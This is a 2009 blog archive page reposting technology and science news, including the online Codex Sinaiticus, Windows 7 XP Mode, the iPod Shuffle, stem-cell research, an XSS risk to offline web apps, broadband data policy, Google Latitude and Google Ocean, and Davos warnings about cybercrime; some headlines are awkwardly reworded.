Showing posts with label information watch. Show all posts
Showing posts with label information watch. Show all posts

Tuesday, July 7, 2009

Christian Bible Goes Digital


Christian Bible Goes Digital

Time is never kind to paper manuscripts, particular those written more than 1600 years ago. Some 800 pages remain of the Codex Sinaiticus, a version of the Christian Bible written in the fourth century, and the original text is thought to be nearly twice as long. Historians believe the book may be world's oldest Christian Bible.

to today's online publication of the Codex Sinaiticus, scholars can examine the entire book from the comfort of their desks. Curious? You can explore the document yourself. Stephen Bates of The Guardian explains the significance of the online edition:
". . . so sophisticated is modern technology that scholars will not only be able to read the document on their screens using a standard light setting, but also separately by a raking illumination that highlights the texture and features of the very parchment on which the 800 surviving pages of text were written."
It's fair to say the online edition of Codex Sinaiticus won't have mainstream appeal. But the project does illustrate the power of the Internet to advance educational pursuits.

Monday, April 27, 2009

Microsoft is adding a "Windows XP Mode" to Windows 7


Now Windows 7 gets built in XP mode..
Microsoft is adding a "Windows XP Mode" to Windows 7, in a move to encourage users to make the switch to the software vendor's forthcoming operating system.

The firm has built its XP mode into Windows 7 by using the Windows Virtual PC technology Microsoft acquired in 2003, to make the OS compatible to run apps designed for Vista's predecessor.
Redmond was keen to emphasise in a blog post late on Friday that it's hoping to woo small businesses to move to Windows 7 by bigging up the XP mode feature.

"Windows XP Mode is specifically designed to help small businesses move to Windows 7," said Microsoft. "Windows XP Mode provides you with the flexibility to run many older productivity applications on a Windows 7 based PC."

Users can install apps directly into the virtualised XP environment. The applications are then published to the Windows 7 desktop and they can be run from within that OS.

Microsoft said it will release a beta of Windows XP mode and Windows Virtual PC for Windows 7 Professional and Windows 7 Ultimate "soon" but wasn't more specific about when the test builds will land.

When Microsoft released Vista over two years ago, many businesses and individuals complained about compatibility snafus with applications that simply wouldn't work within the new OS

Friday, March 13, 2009

Apple unveiled the new iPod Shuffle


Apple iPod Shuffle....
Apple unveiled the new iPod Shuffle, which is only half the volume of the previous iPod Shuffle, which itself was about the size of a quarter. The new one looks like a sleek aluminum tie clip, or maybe a slightly elongated stick of Trident gum; a AA battery hides it completely. There's just enough room on the back for a mirror-finish spring clip for fastening to your clothes. (If you order from apple.com, you can get a custom message laser-etched onto the clip.)
Apple's third-generation iPod Shuffle MP3 player ($79) is the smallest MP3 player you can buy. Its unique size and uncommon, remote-controlled design won't suit every purpose, but people looking for the next best thing to an invisible iPod will appreciate the player's minimal approach.

Design

At first glance, the iPod Shuffle looks almost like a practical joke--as if someone is trying to convince you that their tie clip plays MP3s. The aluminum-encased hardware measures just a few hairs larger than a paper clip (0.7 inch by 1.8 inches by 0.3 inch) and includes not a hint of button, knob, or screen. The headphone jack sits on the top edge of the Shuffle along with a switch that controls playback mode (shuffle playback/consecutive playback) and power.

Fortunately, Apple doesn't expect you to control the Shuffle's volume and playback using mind control (not yet, at least). The earbud-style headphones bundled with the Shuffle include a remote control on the cable, just below the right ear. The remote offers three buttons: two for volume control (up/down); and a central button with multiple functions. You press the center button once to pause music playback, twice to skip forward, and three times to skip back. Of course, the downside to this headphone-controlled design is if you lose your headphones, you also lose control of your iPod. Apple's own replacement earbuds for the Shuffle run $29, but it's possible to grab third-party headphones and adapters for less.
The headphone cable reaches 3 feet, which should be more than enough length considering that the Shuffle is meant to be clipped to your clothing. A hinged chromed metal clip runs the length of the Shuffle on one side and includes a slot for attaching a lanyard or keychain. An Apple logo is engraved on the clip, and custom engraving is offered on orders placed through Apple's online store.

Features

The Shuffle is purely a digital audio player. There's no FM radio, no voice recording, and--obviously--no photo or video playback. Audio formats supported include MP3, AAC, Audible, WAV, AIF, and Apple Lossless, but no hope for WMA or FLAC.

The third-generation version of the iPod Shuffle offers a few new features over previous models, though. For one, this is the first Shuffle that tells you what you're listening to, which is no small accomplishment considering the player doesn't have a screen. The Shuffle uses a synthesized voice to announce artist and song title information whenever you hold the headphone clicker down. Apple is calling this feature VoiceOver and offers support for 14 languages, with voice quality hinging on what type of computer and operating system you're using.

Monday, March 2, 2009

Scientists have developed safer way to alternative to embryonic stem cells


Scientists have developed what appears to be a safer way to create a promising alternative to embryonic stem cells, boosting hopes that such cells could sidestep the moral and political quagmire that has hindered the development of a new generation of cures.

The researchers produced the cells by using strands of genetic material, instead of potentially dangerous genetically engineered viruses, to coax skin cells into a state that appears biologically identical to embryonic stem cells.

"It's a leap forward in the safe application of these cells," said Andras Nagy of Mount Sinai Hospital in Toronto, who helped lead the international team of researchers that described the work in two papers being published online today by the journal Nature. "We expect this to have a massive impact on this field."

In addition to the scientific implications, the work comes at a politically sensitive moment. Scientists are anxiously waiting for President Obama to follow through on his promise to lift restrictions on federal funding for research on human embryonic stem cells. Critics of such a move immediately pointed to the work as the latest evidence that the alternative cells make such research unnecessary.

"Stem cell research that requires destroying embryos is going the way of the Model T," Richard M. Doerflinger of the U.S. Conference of Catholic Bishops said. "No administration that values science and medical progress over politics will want to divert funds now toward that increasingly obsolete and needlessly divisive approach."

Scientists, however, while praising the work as a potentially important advance, said it remains crucial to work on both types of cells because it is far from clear which will turn out to be more useful.

"The point is, we don't know yet what the end potential of either of these approaches will be," said Mark A. Kay of Stanford University. "No one has cured any disease in people with any of these approaches yet. We don't know enough yet to know which approach will be better."

Because embryonic stem cells are believed capable of becoming any kind of tissue in the body, scientists believe they could eventually lead to treatments or even cures for a host of ailments, including heart disease, diabetes, and Alzheimer's and Parkinson's diseases. In 2001, President George W. Bush restricted federal funding for human embryonic stem cell research to prevent taxpayer money from encouraging the destruction of human embryos, which is necessary to obtain the cells.

The alternative cells, known as induced pluripotent stem cells, or iPS cells, appear to have many of the same characteristics as embryonic stem cells but are produced by activating genes in adult cells to "reprogram" them into a more primitive state, bypassing the moral, political and ethical issues surrounding embryonic cells. Until now, however, their use has been limited because the genetic manipulation required the use of viruses, raising concerns the cells could cause cancer if placed in a patient. That has triggered a race to develop alternative approaches.

"These viral insertions are quite dangerous," Nagy said.

In the new work, Nagy and his colleagues in Toronto and at the University of Edinburgh in Scotland instead used a sequence of DNA known as a transposon, which can insert itself into the genetic machinery of a cell. In this case, the researchers used a transposon called "piggyBac" to carry four genes that can transform mouse and human embryonic skin cells into iPS cells. After the conversion took place, the researchers removed the added DNA from the transformed cells using a specific enzyme.

"PiggyBac carries the four genes into the cells and reprograms the cells into stem cells. After they have reprogrammed the cells, they are no longer required, and in fact they are dangerous," Nagy said. "After they do their job they can be removed seamlessly, with no trace left behind. The ability for seamless removal opens up a huge possibility."
A series of tests showed that the transformed cells had many of the properties of embryonic stem cells, Nagy said.

The researchers did their initial work on skin cells from embryos but say the approach should work just as efficiently in adult cells, and they plan to start those experiments.

"We do not expect that adult cells would behave significantly differently than the ones we are using currently," Nagy said.

In addition to producing safer cell lines that would be less likely to cause cancer in patients, the advance will enable many more scientists to begin working on such cells because they require no expertise or special laboratories necessary for working with viruses, he said.

"This opens up the possibility of working in this field for laboratories that don't have viral labs attached to them. A much larger number of laboratories will be able to push this field forward," Nagy said.

Other researchers praised the work.

"It's very significant," said George Q. Daley, a stem cell researcher at Children's Hospital in Boston. "I think it's a major step forward in realizing the value of these cells for medical research."

"It's very exciting work," agreed Robert Lanza, a stem cell researcher at Advanced Cell Technology in Worcester, Mass. "With the new work, we're only a hair's breadth away from the biggest prize in regenerative medicine -- a way to create patient-specific cells that are safe enough to use clinically."

Kay agreed that the work is promising but cautioned that much more research will be needed to prove that cells produced this way are safe. Many scientists are working on other approaches that may turn out to be safer and more efficient, he said.

"This is a step forward. The research is heading in the right direction. But there still may be room for improvement," he said.

more...
New Method For Creating Stem Cells
Mount Sinai Hospital's Dr. Andras Nagy discovered a new method of creating stem cells that could lead to possible cures for devastating diseases including spinal cord injury, macular degeneration, diabetes and Parkinson's disease. The study, published by Nature, accelerates stem cell technology and provides a road map for new clinical approaches to regenerative medicine.

Sunday, February 22, 2009

Offline web applications allow people to store data on their own computer


Working offline can come with an unexpected risk
A security expert has sounded a warning on features that allow offline access to websites. so that they can use services like web-based e-mail when not online.
Be cautious when you get an email that says "there's a problem with your password, click on this link and we'll fix it"
But sites with poor security that use the feature put their visitors at risk of being robbed of their data.

Michael Sutton disclosed the threat at the Black Hat security conference in Washington, DC.

Offline web applications are taking off because of services such as Gears, developed by Google, and HTML 5, a new HTML specification that is still in draft form.

It was introduced to many web users in January, when Gmail introduced a Gears-powered offline mode. Offline Gmail lets users read and write e-mail when they're not connected to the internet.

Mr Sutton stressed that Gmail, Gears and HTML 5 are considered secure, but websites that implement offline features without proper security could put users at risk.

"You can take this great, cool secure technology, but if you implement it on an insecure website, you're exposing it. And then all that security is for naught."

Mr Sutton found that websites which suffer from a well-known security vulnerability known as cross-site scripting are at risk.

A hacker could direct a victim to a vulnerable website and then cause the user's own browser to grab data from their offline database.
Unlike phishing, the whole attack could take place on a reputable site, which makes it harder to detect.

As a proof of concept, Mr Sutton was able to swipe information from the offline version of a time-tracking website called Paymo. Mr Sutton alerted Paymo and it fixed the vulnerability immediately.

Web developers must ensure that their sites are secure before implementing offline applications, said Mr Sutton.

"Gears is fantastic and Google has done a great job of making it a secure technology. But if you slap that technology into an already vulnerable site, you're leaving your customers at risk," he explained.

Security expert Craig Balding agreed that it was up to developers to secure their sites, as the line between desktop applications and web applications becomes more blurred.

"Every website wants to keep up in terms of features, but when developers turn to technologies like this they need to understand the pros and cons," he told BBC News.

Tuesday, February 10, 2009

US Broadband Infrastructure Investments necessitate Transparency

broadband infrastructure investments planned as part of the economic stimulus package need transparency if they're to be effective

The key public policy problem with broadband is that citizen-consumers and policy-makers still lack basic information.

Government investment in broadband networks has emerged as one of the more contentious parts of the economic stimulus legislation slated for a Senate vote Tuesday. Already, at least $2 billion of a planned $9 billion for broadband has apparently been cut from the latest bill, as legislators and interest groups squabble over who should control Internet communications funding, and under what rules.

What should be less controversial is that intelligent spending decisions about funding for high-speed Internet connections can't be made without excellent and transparent data about our broadband infrastructure.

The key public policy problem with broadband is that citizen-consumers and policy-makers still lack basic information. The Bush administration set a goal of achieving universal broadband by the end of 2007, then declared "mission accomplished" without providing much evidence to substantiate its claim. And under former Federal Communications Commission Chairman Kevin Martin, the agency refused to release what data it did have about competitors in the broadband marketplace.
President Obama's commitment to "change" has included a more hands-on approach to promoting broadband. Throughout the presidential campaign, and repeatedly since the election, Obama has emphasized the importance of "expanding broadband lines across America." With input from his telecommunications advisors, the House stimulus bill included $6 billion for broadband. Early versions of the Senate measure raised the total to $9 billion.
Statistics?
Equally important is Obama's commitment to empirically-driven policymaking. In January, Obama became only the second president—after William Howard Taft in 1909—to invoke "statistics" in an inaugural address, when he spoke of "the indicators of crisis, subject to data and statistics."

The US spends more than $8 billion a year on statistics. Much of that goes to fund the Census Bureau and data collection about agricultural and labor markets, such as the monthly unemployment report, which on Friday brought the grim news that the economy had shed 598,000 jobs in January. Last week, when the Agriculture Department released its own census, Agriculture Secretary Tom Vilsack reminded reporters: "Numbers and data are very important. They direct policy; they shape policy. They can tell us what we are doing right. They call tell us what we are doing wrong."
Yet almost none of this $8 billion in statistical spending goes to compiling information about broadband, the infrastructure of the knowledge-based economy. And the data that has been collected has been made to mislead.
The FCC—the official record-keeper on private-sector telecommunications—for years claimed that there was adequate competition in broadband because the median ZIP code was served by eight separate providers. The Government Accountability Office's assessment of the same data found a median of two providers per ZIP code. Worse, the FCC refuses to release the information that it has about competition.
A variety of organizations—including my own free web service, BroadbandCensus.com—have stepped in to do our best at collecting, compiling and releasing public broadband information. We believe that if you want to build a road, you need a map that tells you where existing roads lie before you begin taking construction bids, let alone start pouring concrete. Where will our nation's new broadband highways, by-ways and access points be built? Who's going to let the contracts? Who will own this infrastructure?
These questions can't be answered without detailed broadband data. To that end, I've supported a proposed "State Broadband Planning and Assessment Act," which could be introduced as an amendment to the fiscal stimulus measure. The goal of this effort, as of BroadbandCensus.com, is to unleash the Internet as means of sharing information about the Internet itself.
For two-and-a-half years, I've been trying to get access to basic broadband data for the public, including citizen-consumers, businesses, and local policy-makers. I've been seeking to identify which carriers offer service in a particular ZIP code, as well as smaller units, like census blocks. In September 2006, when I headed a project at the Center for Public Integrity that investigated the telecommunications industry, we filed a Freedom of Information Act lawsuit against the FCC to force them to release basic broadband data about carriers by ZIP code.
The project obtained and displayed similar location information about broadcasters and cable operators from the FCC's cumbersome web site. But our attempts to get broadband data were thwarted by the FCC and by industry. AT&T, Verizon Communications, and the lobbying organizations representing the Bell companies, the cable companies, the cell phone carriers, and wireless broadband providers all asked the FCC to deny information to the public. Even though every consumer who buys broadband knows the name of the company that provides them with service, the telecoms argued that compiling this information into a single location would reveal "proprietary" data. The FCC agreed.


The FCC did not want disclosure, and neither did the telecom incumbents and their lobbyists. They did not want successful broadband competition.

In its legal briefings, the FCC argued that releasing the data would lead to competition in communications—which was why it couldn't release the data! "Disclosure could allow competitors to free ride on the efforts of the first new entrant to identify areas where competition is more likely to be successful," the agency told the federal district court in Washington.

The once-vaunted virtue of competition in federal telecommunications policy—the underpinning of the 1996 Telecom Act—had taken a back seat to the privilege of supposedly proprietary information. The FCC did not want disclosure, and neither did the telecom incumbents and their lobbyists. They did not want successful broadband competition.
Congress was critical of the FCC's meager broadband statistics. In October it passed the Broadband Data Improvement Act to prod the agency to collect broadband data at a level more granular than the ZIP-code. The FCC began doing just that in June, as the bill was working its way through Congress.
But under pressure from telecom lobbyists, Congress dropped a core provision from the House version of the bill: the requirement that a separate agency, the Commerce Department's National Telecommunications and Information Administration, take responsibility for conducting a national broadband census and producing a public map with the names of individual carriers and where they offered service.
The House version of the stimulus bill reintroduces the NTIA broadband map. But it takes out any mention of publicly releasing individual carrier names. Worse, the Broadband Data Improvement Act enshrined the business model favored by the carriers: providing information to an entity like Connected Nation, which agrees to excise the names of broadband providers from the maps they produce.
The House stimulus bill allocated $40 million to this business model. Last week's version of the Senate stimulus bill upped the total to $350 million.
President Obama has the opportunity to make broadband a priority in his administration by ensuring that the NTIA creates a public map of our national broadband providers and infrastructure. Map in hand, the Obama administration's broadband policy should be guided by three important principles:
1) Use the Internet to empower citizens and consumers.
With the FCC keeping broadband data out of the hands of the public, I started BroadbandCensus.com to publish the same information that any consumer can know: the name of their Internet service provider and type of broadband connection, how much they are charged for service, and the Internet speeds they are promised and actually delivered. The government of Ireland publishes exactly the same information on its communications ministry web page.
Some broadband data efforts focus on the needs of telecommunications carriers and their unionized employees. Based in Kentucky, Connected Nation has been promoting their state-wide maps of broadband availability as a means for providers to sell more service. The Communications Workers of America's Speed Matters campaign has collected random speed tests from Internet users to provide a snapshot about download and upload speeds. Both of these initiatives are good, so far as they go.
But to rigorously understand the condition of broadband, we can't rely only on the information provided by the carriers. It needs to be verified by Internet users. To truly unlock the power of Internet-enabled "crowdsourcing," an effective broadband strategy must focus on citizens. Empower them by releasing basic information and letting citizen-consumers add to the mash-up. It's about making citizens contributors as well as constituents.
2) Ensure that infrastructure investment is made on the basis of cost-benefit data.
In 1790, the United States was the first country to institute a periodic national census. What started as a questionnaire seeking only demographic information had broadened by 1840 to information about employment in mining, agriculture, manufacturing, and the "learned professions and engineers." Such information has enabled our government, our universities and our business sector to rely on good-quality statistical information.
We're going to need that kind of data, and a lot more of it, to make sound investment decisions about broadband. Because of our nation's agricultural origins, our statistical agencies provide far more data about crop production than they do about broadband availability, speeds, or prices. In the absence of good data, the temptation is to make public infrastructure investment decisions based on political pressure or lawmaker influence, rather than upon solid cost-benefit analyses.
3) Use the transparency of the Internet to regulate incumbents through public disclosure.
The regulatory philosophies of the New Deal—maximum and minimum wages and prices, hands-on federal regulation—have faded and are not likely to be revived even in the current crisis. Yet one Depression-era innovation of Franklin D. Roosevelt remains as valid as ever: the disclosure-based regime of the Securities and Exchange Commission.
The SEC is vigilant in requiring punctilious compliance with requirements that public companies disclose details of their operations. By and large, the SEC doesn't require substantive actions so much as it requires procedural compliance and full disclosure. Open information flows mean that poor corporate decisions are punished in the marketplace.
Equally important is that role that independent efforts, like those of BroadbandCensus.com and others, can play in collecting and aggregating public broadband data about speeds, prices, and reliability.
For more than a year, BroadbandCensus.com has provided a platform allowing Internet users to compare their actual broadband speeds against what they are promised by their carriers. We use the open-source Network Diagnostic Tool (NDT) of Internet2. All speed test data is publicly displayed under a Creative Commons license. This approach to public monitoring Internet traffic has recently been followed by Google and the New America Foundation and their "Measurement Lab" initiative, which also uses NDT.
Ultimately, broadband carriers that offer good speeds and good service will see the value in an objective and transparent broadband census. Fortunately, consumers don't need to wait on the carriers to begin collecting and publishing broadband of their own.
Neither should the government. No matter how much Congress decides to allocate to stimulate broadband, it should insist that information about speeds, prices, technologies, and specific locations of high-speed Internet availability are publicly available to all.
more.......
Guiding principles for U.S. broadband infrastructure economic stimulus
As Congressional leaders and the incoming administration of U.S. President-elect Barack Obama mull economic stimulus legislation including a portion of which is expected to be devoted to telecommunications infrastructure to boost broadband Internet access, I offer these guiding principles:
1. The focus should be on the so-called "last mile" or local access network portion of the system. There's a broad consensus that the lack of adequate broadband access in the United States is due to technological shortcomings on this segment of the telecommunications infrastructure, its weakest link. The overall goal should be full build out of this currently incomplete but vital infrastructure to serve all residents and businesses.

Wednesday, February 4, 2009

silicon chips used to repair damaged tissue in the human body.

Computer chips may 'revamp nerve

Researchers have enthused closer to creation silicon chips which could one day be used to fix damaged tissue in the human body.


Edinburgh University has developed a technique, which allows neurons to grow in fine, detailed patterns on the surface of tiny computer chips.


Neurons are the basic cells of the human nervous system.
The scientists said the development may eventually enable chips to replace damaged nerve or muscle fibres.
They also said the development could possibly be used in the development of prosthetics in the future.
During the chip manufacturing process, the scientists printed patterns on the smooth silicon surface.


The chip was then dipped in a patented mixture of proteins, and neurons grew along the patterns on the surface.
The technique also works with stem cells.
It is hoped the method will eventually enable any type of tissue to be grown on a tailor-made pathway and implanted as prosthetic tissue in the body.
Professor Alan Murray, head of Edinburgh University's School of Engineering and Electronics, who led the research, said: "This is a small but important step on the path towards the long-term goal of many scientists and medical experts - to develop surgical implants using silicon chips.
"We can now make silicon chips with circuitry as well as pathways where cells can grow in the body.
"One of the areas this could be used in is prosthetics - if we can cause cells from damaged tissues to grow where we want.
"It is going towards the realms of science fiction - there is a definite Incredible Hulk feel about it."
He added: "We also hope that, rather sooner than this, the technique will allow better methods of drug discovery and reduce the need for animal testing, as new medicines could be tested on chips rather than in live creatures."
The research was funded by the Engineering and Physical Sciences Research Council.

Tuesday, February 3, 2009

where your kid is just now Do you know it?Check Google's maps


A screen grab showing Google's upgraded mapping system is seen in this photo provided by Google Inc. The new software to be released Wednesday, Feb. 4, 2009, will enable people to use mobile phones and other wireless devices to automatically share their whereabouts with family and friends
Recorded on Google Street View

When you follow the street view scene (intermittently unavailable due to high demand) down Five Points Road, in Rush NY, you first see that the deer runs out in front of the vehicle, it gets hit, and then it can be viewed on the side of the road prior to the car pulling over, and then, you see no more footage on Five Points Road.The sequence has been captured also on Gizmodo. I warn anyone visiting that site that it's not the most pleasant as the dear is seen injured lying on the ground.Maybe the photographer felt bad, and couldn’t take any more photos for the day. One would think he would have held out on turning these in too.

With an upgrade to its mobile maps, Google Inc. hopes to prove it can track people on the go as effectively as it searches for information on the Internet.
The new software to be released Wednesday will enable people with mobile phones and other wireless devices to automatically share their whereabouts with family and friends.
The feature, dubbed "Latitude," expands upon a tool introduced in 2007 to allow mobile phone users to check their own location on a Google map with the press of a button.
"This adds a social flavor to Google maps and makes it more fun," said Steve Lee, a Google product manager.
It could also raise privacy concerns, but Google is doing its best to avoid a backlash by requiring each user to manually turn on the tracking software and making it easy to turn off or limit access to the service.
Google also is promising not to retain any information about its users' movements. Only the last location picked up by the tracking service will be stored on Google's computers, Lee said.
The software plots a user's location — marked by a personal picture on Google's map — by relying on cell phone towers, global positioning systems or a Wi-Fi connection to deduce their location. The system can follow people's travels in the United States and 26 other countries.
It's left up to each user to decide who can monitor their location.
The social mapping approach is similar to a service already offered by Loopt Inc., a 3-year-old company located near Google's Mountain View headquarters.
Loopt's service already is compatible with more than 100 types of mobile phones.
To start out, Google Latitude will work on Research In Motion Ltd.'s Blackberry and devices running on Symbian software or Microsoft Corp.'s Windows Mobile. It will also operate on some T-1 Mobile phones running on Google's Android software and eventually will work on Apple Inc.'s iPhone and iTouch.
To widen the software's appeal, Google is offering a version that can be installed on personal computers as well.
The PC access is designed for people who don't have a mobile phone but still may want to keep tabs on their children or someone else special, Lee said. People using the PC version can also be watched if they are connected to the Internet through Wi-Fi.
Google can plot a person's location within a few yards if it's using GPS or might be off by several miles if it's relying on transmission from cell phone towers. People who don't want to be precise about their whereabouts can choose to display just the city instead of a specific neighborhood.
There are no current plans to sell any advertising alongside Google's tracking service, although analysts believe knowing a person's location eventually will unleash new marketing opportunities. Google has been investing heavily in the mobile market during the past two years in an attempt to make its services more useful to people when they're away from their office or home computers.

Victory of MS stem-cell treatment

Stem cells are showing more and more potential in the treatment of MS and the challenge we now face is proving their effectiveness in trials involving large numbers of people.
Not one of 21 adults with relapsing-remitting MS who had stem cells transplanted from their own bone marrow deteriorated over three years.
And 81% improved by at least one point on a scale of neurological disability, The Lancet Neurology reported.
Further tests are now planned, and a UK expert called the work "encouraging".
MS is an autoimmune disease which affects about 85,000 people in the UK.
It is caused by a defect in the body's immune system, which turns in on itself, causing damage to the nerves which can lead to symptoms including blurred vision, loss of balance and paralysis.

At first, the condition mostly causes intermittent symptoms that are partly reversible.
Over a 10-15 year period after onset, most patients develop secondary-progressive MS, with gradual but irreversible neurological impairment.
It is not the first time this treatment - known as autologous non-myeloablative haemopoietic stem-cell transplantation - has been tried in people with MS, but there has not been a great deal of success.
The researchers at Northwestern University School of Medicine in Chicago said most other studies had tried the transplants in people with secondary-progressive MS where the damage had already been done.
In the latest trial patients with earlier stage disease who, despite treatment had had two relapses in the past year, were offered the transplant.
Immune system
Stem cells were harvested from the patients and frozen while drugs were given to remove the immune cells or lymphocytes causing the damage.
The stem cells were then transplanted back to replenish the immune system - effectively resetting it.
Five patients in the study relapsed, but went into remission after receiving other therapy.
The researchers are now doing a randomised controlled trial in a larger number of patients to compare the treatment with standard therapy.
Study leader Professor Richard Burt said this was the first MS study of any treatment to show reversal of damage.
"You don't want to wait until the horse has left the barn before you close the barn door - you want to treat early.
"I think the reversal is the brain repairing itself.
"Once you're at the progressive stage you have exceeded the ability of the brain to repair itself," he said.
However, he cautioned that it was important to wait for the results of the larger trial.
And that he would not call it a cure but "changing the natural history of the disease".
Dr Doug Brown, research manager at the MS Society, said the results were very encouraging.
"It's exciting to see that in this trial not only is progression of disability halted, but damage appears to be reversed.
"Stem cells are showing more and more potential in the treatment of MS and the challenge we now face is proving their effectiveness in trials involving large numbers of people."

Google Earth goes underwater

Google Earth dives in the sea
Google dove into the sea on Monday by releasing an updated 3-D mapping service that lets users discover the ocean as if they were dolphins, swimming past flooded volcanoes and throughout underwater canyons.

You can now dive into the world's ocean that covers almost three-quarters of the planet and discover new wonders.

Google Ocean expands this map to include large swathes of the ocean floor and abyssal plain.
Users can dive beneath a dynamic water surface to explore the 3D sea floor terrain.
The map also includes 20 content layers, containing information from the world's leading scientists, researchers, and ocean explorers.

Al Gore was at the launch event in San Francisco which, Google hopes, will take its mapping software a step closer towards total coverage of the entire globe.
In a statement, Mr Gore said that the update would make Google Earth a "magical experience".
"You can not only zoom into whatever part of our planet's surface you wish to examine in closer detail, you can now dive into the world's ocean that covers almost three-quarters of the planet and discover new wonders that had not been accessible in previous versions".
Approximately 70% of the worlds surface is covered by water and contains nearly 80% of all life, yet less than 5% of it has actually been explored.
Google Oceans aims to let users visit some of the more interesting locations, including underwater volcanoes, as well as running videos on marine life, shipwrecks and clips of favourite surf and dive spots.
The new features were developed in close collaboration with oceanographer Sylvia Earle and an advisory council of more than 25 ocean advocates and scientists.
Sylvia Earle, the National Geographic Society's explorer in residence, said the new features would bring the blue planet to life.
"I cannot imagine a more effective way to inspire awareness and caring for the blue heart of the planet than the new Ocean in Google Earth."
"For the first time, everyone from curious kids to serious researchers can see the world, the whole world, with new eyes," she added.
There are also updates on the terrestrial side, including GPS tracking, virtual time travel (where users can observe changes in satellite images, such as the 2006 World Cup stadium or the desertification of Africa's Lake Chad) and narrated tours of imagery and content in Google Earth. There are also updates to the Mars 3D section, so if users have had enough of the blue planet, they can always look at the red one.


The enhanced Google Earth, available for download at earth.google.com, offers everything from photographs and videos of sea life to models of shipwrecks to water temperature data collected from buoys. Dozens of partners - including the National Geographic Society, the National Oceanographic and Atmospheric Administration and the Scripps Oceanographic Institution - contributed information to the project, which is aimed at fostering learning, promoting conservation and, no doubt, increasing Google's popularity.
By plunging underwater, Google is adding a new dimension to Google Earth, which previously showcased only the terrestrial world. Premiered four years ago, it was probably best known as a tool for users to get a bird's-eye view of their homes and to peep on their neighbor's backyards.
The omission of the liquid two-thirds of the planet prompted Sylvia Earle, the former chief scientist at NOAA and noted oceanographer, to quip once that Google Earth should be renamed "Google dirt." On stage Monday at a Google kickoff event at San Francisco's California Academy of Sciences, she declared the enhanced version a "fantastic new rendition of the earth."
Google Earth lets you fly anywhere on Earth to view satellite imagery, maps, terrain, 3D buildings, from galaxies in outer space to the canyons of the ocean. You can explore rich geographical content, save your toured places, and share with others.

Monday, February 2, 2009

Scientists akin to Obama's environmental diagram

President Barack Obama with Transportation Secretary Ray LaHood and EPA Administrator Lisa Jackson
Environmentalists are encouraged by President Barack Obama's focus this week on renewable energy and stricter emissions standards, although some economists are skeptical he can pull the country out of the recession while cleaning up the planet.

Obama must strike a careful balance between stimulating the economy in the coming months and investing in the long-term future of the environment, said Raj Chetty, professor of economics at the University of California, Berkeley.
"If you spend money too quickly, you lose site of the long-term vision," Chetty told CNN. "If you focus too much on the long term, you may not act on spending money."
Framing his remarks with an eye on the recession, the president on Monday announced a plan for "a new energy economy that will build millions of jobs." Obama proposes to put 460,000 Americans to work through clean energy investments, increasing fuel efficiency in vehicles and reducing greenhouse gas emissions.
By 2025, the Obama administration hopes one-fourth of the nation's energy will come from renewable sources. Over the long term, the president hopes to create millions of new jobs by investing $150 billion in taxpayer money to help private companies develop new sources of clean energy, such as wind, solar and geothermal power.


It's about time, say scientists who often clashed with former President George W. Bush on environmental policy.

"By repowering our nation with clean energy, we will create millions of jobs that can't be sent overseas. By harnessing the energy of the sun and wind, we can refuel our nation and end our addiction to oil," said Wesley Warren, director of programs for the Natural Resources Defense Council.
Environmental scholars, however, say the changes Obama seeks are not easy.
"These technologies are not new. They have been around for 10 to 15 years," said Bill Chameides, dean of the Nicholas School of Environment at Duke University. "Government can push new policies, but it has to prove to be economically competitive or else it will not happen."
"It is going to require massive investments," said Joseph Romm, former acting assistant secretary of energy under the Clinton administration and senior fellow at the Center for American Progress. "The only question is, are we going to be the leader and export our technologies or a follower and continue importing our resources?"
Some economists question whether spending government money on new energy technologies is the best way to stimulate the economy in the short term.
Opponents of Obama's proposals say renewable energy would be expensive, take up large amounts of land, and might not even be able to generate sufficient energy given the aging infrastructure of the nation's electric grid.
"If the private sector will not invest in these technologies, it will not be efficient," said Alan Reynolds, senior fellow at the Cato Institute.
"Creating jobs by switching from one form of energy to another is a bad idea," he added. "You don't need subsidies for anything that is free. Getting a $7,000 rebate on a $100,000 plug-in electrical hybrid that gets its power from a coal plant doesn't make a lot of sense."
Several events in Washington this week underscored the Obama administration's commitment to environmental issues. Secretary of State Hillary Clinton on Monday named a special envoy to pursue global agreements combating global warming. On Wednesday, former Vice President Al Gore urged Congress to approve Obama's stimulus package and said the United States needs to join international talks on a climate-change treaty.
"For years our efforts to address the climate crisis have been undermined by the idea that we must chose between our planet and our way of life, between our moral duty and economic well-being these are false choices," Gore told the Senate Foreign Relations Committee.
"In fact, the solutions to the climate crisis are the same solutions that will address our economic and national crisis as well."
Obama may have science on his side. By overwhelming consensus, scientists agree that our warming planet poses a greater global threat with every passing day.
The replacement of current technology with energy generated from natural resources, such as sunlight and wind, could help reduce CO2 emissions by 50 percent by 2050, according to the International Energy Agency.
"Frankly the science is screaming at us," said Sen. John Kerry, chairman of the Senate Foreign Relations Committee, at Wednesday's hearing. "Carbon dioxide emissions grew at a rate of four times faster in the Bush administration than they did in the 1990s."
Even so, experts agree the faltering economy will complicate any discussion about investment in clean energy.
"The country is running two deficits," said David Orr, a professor of environmental studies and politics at Oberlin College, "the economy in the short term, which will take one to five years to figure out [and] the environment in the long term, which if we don't do anything about it will see catastrophic effects."

cybercrime is rising sharply, experts have warned at the World Economic Forum in Davos.


Cybercrime threat rising stridently.
The threat of cybercrime is rising sharply, experts have warned at the World Economic Forum in Davos.

They called for a new system to tackle well-organised gangs of cybercriminals.

Online theft costs $1 trillion a year, the number of attacks is rising sharply and too many people do not know how to protect themselves, they said.

The internet was vulnerable, they said, but as it was now part of society's central nervous system, attacks could threaten whole economies.

The past year had seen "more vulnerabilities, more cybercrime, more malicious software than ever before", more than had been seen in the past five years combined, one of the experts reported.

But does that really put "the internet at risk?", was the topic of session at the annual Davos meeting.

On the panel discussing the issue were Mozilla chairwoman Mitchell Baker (makers of the Firefox browser), McAfee chief executive Dave Dewalt, Harvard law professor and leading internet expert Jonathan Zittrain, Andre Kudelski of Kudelski group, which provides digital security solutions, and Tom Ilube, the boss of Garlik, a firm working on online web identity protection.

They were also joined by Microsoft's chief research officer, Craig Mundie.

To encourage frank debate, Davos rules do not allow the attribution of comments to individual panellists

Threat #1: Crime

The experts on the panel outlined a wide range of threats facing the internet.
There was traditional cybercrime: committing fraud or theft by stealing somebody's identity, their credit card details and other data, or tricking them into paying for services or goods that do not exist.

The majority of these crimes, one participant said, were not being committed by a youngster sitting in a basement at their computer.

Rather, they were executed by very large and very well-organised criminal gangs.

One panellist described the case of a lawyer who had realised that he could make more money though cybercrime.

He went on to assemble a gang of about 300 people with specialised roles - computer experts, lawyers, people harvesting the data etc.

